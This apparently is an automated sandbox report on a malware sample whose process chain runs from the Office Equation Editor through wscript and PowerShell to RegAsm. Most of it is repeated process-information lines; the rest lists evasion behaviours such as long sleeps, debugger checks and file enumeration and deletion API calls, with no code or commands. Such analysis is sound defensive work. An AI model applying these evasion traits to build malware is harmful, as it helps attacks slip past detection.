Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_0040F7A7 Sleep,ExitProcess,

11_2_0040F7A7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

11_2_0041A748

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2420	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 435	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1174	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8692	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 9755	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3064	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 1060	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2844	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3064	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 920	Thread sleep count: 1174 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1456	Thread sleep count: 8692 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3104	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3108	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3108	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3108	Thread sleep time: -1200000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3224	Thread sleep count: 233 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3224	Thread sleep time: -699000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3224	Thread sleep count: 9755 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3224	Thread sleep time: -29265000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_00409253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	11_2_0041C291
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	11_2_0040C34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	11_2_00409665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0044E879 FindFirstFileExA,	11_2_0044E879
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	11_2_0040880C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040783C FindFirstFileW,FindNextFileW,	11_2_0040783C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_00419AF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_0040BD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

11_2_00407C97

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node			graph_2-358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node			graph_11-48901

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

11_2_004349F9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

11_2_0041CB50

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035C06B4 mov edx, dword ptr fs:[00000030h]		2_2_035C06B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_004432B5 mov eax, dword ptr fs:[00000030h]		11_2_004432B5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00412077 GetProcessHeap,HeapFree,

